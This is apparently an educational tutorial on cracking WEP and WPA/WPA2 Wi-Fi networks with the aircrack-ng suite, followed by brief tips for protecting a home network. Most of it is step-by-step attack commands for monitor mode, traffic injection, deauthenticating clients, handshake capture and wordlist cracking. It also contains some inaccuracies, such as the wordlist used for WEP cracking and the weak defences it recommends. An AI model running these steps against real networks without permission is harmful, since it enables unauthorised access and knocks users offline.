Wi-Fi Hacking: WEP/WPA/WPA2 Attacks

TL;DR

This guide explains how Wi-Fi networks using older security (WEP) and common security (WPA/WPA2) can be attacked. It’s for educational purposes only – attempting to hack networks without permission is illegal. We’ll cover the basics of each attack type, tools used, and ways to protect your own network.

1. Understanding Wi-Fi Security

Before we start, let’s quickly look at the security types:

• WEP (Wired Equivalent Privacy): Very old and easily cracked. Avoid using this if possible!
• WPA (Wi-Fi Protected Access): Better than WEP but still vulnerable to attacks, especially dictionary attacks.
• WPA2 (Wi-Fi Protected Access 2): More secure than WPA, but can be cracked with enough time and resources.
• WPA3: The latest standard, offering the best security currently available.

2. Attacking WEP Networks

WEP is outdated and insecure. These attacks are mostly for learning purposes as you’re unlikely to find a network still using it.

2.1 Tools

• Aircrack-ng suite: The primary toolset for Wi-Fi auditing, including tools like Airodump-ng and Aireplay-ng.

2.2 Steps

1. Put your wireless adapter into monitor mode: This allows it to capture all Wi-Fi traffic.

   sudo airmon-ng start wlan0

2. Use Airodump-ng to find target networks: Identify the BSSID (MAC address) of the WEP network you want to attack.

   sudo airodump-ng wlan0mon

3. Capture IVs (Initialization Vectors): Airodump-ng will automatically capture these. You need enough IVs for a successful crack (usually 20,000+).
4. Use Aireplay-ng to generate more traffic: This speeds up the process of capturing IVs.

   sudo aireplay-ng -3 -b BSSID -h MAC_ADDRESS wlan0mon

   (Replace BSSID with the target network’s MAC address and MAC_ADDRESS with your own wireless adapter’s MAC address.)

5. Crack the WEP key using Aircrack-ng:

   sudo aircrack-ng -w /path/to/wordlist.txt capturefile.cap

   (Replace /path/to/wordlist.txt with the path to your wordlist and capturefile.cap with the name of the captured file.)

3. Attacking WPA/WPA2 Networks

Attacking WPA/WPA2 networks is more complex than attacking WEP, but still possible.

3.1 Tools

• Aircrack-ng suite: Still essential for capturing handshakes and cracking passwords.

3.2 Steps (Dictionary Attack)

1. Put your wireless adapter into monitor mode: As with WEP attacks.

   sudo airmon-ng start wlan0

2. Use Airodump-ng to find target networks: Identify the BSSID of the WPA/WPA2 network you want to attack and a connected client.

   sudo airodump-ng wlan0mon

3. Capture the handshake: This is the most important step. You need to capture the 4-way handshake when a device connects to the network. Deauthenticate a client to force them to reconnect.

   sudo aireplay-ng -0 1 -a BSSID -c MAC_ADDRESS wlan0mon

   (Replace BSSID with the target network’s MAC address and MAC_ADDRESS with a connected client’s MAC address.)

4. Crack the password using Aircrack-ng: Use a wordlist to try common passwords.

   sudo aircrack-ng -w /path/to/wordlist.txt handshakefile.cap

   (Replace /path/to/wordlist.txt with the path to your wordlist and handshakefile.cap with the name of the captured handshake file.)

4. Protecting Your Wi-Fi Network

• Use WPA3: If your devices support it, this is the best option for security.
• Strong Password: Use a long, complex password with a mix of uppercase and lowercase letters, numbers, and symbols.
• Hide Your SSID: While not foolproof, hiding your network name makes it slightly harder to find.
• MAC Address Filtering: Only allow known devices to connect to your network.
• Regularly Update Firmware: Keep your router’s firmware up-to-date to patch security vulnerabilities.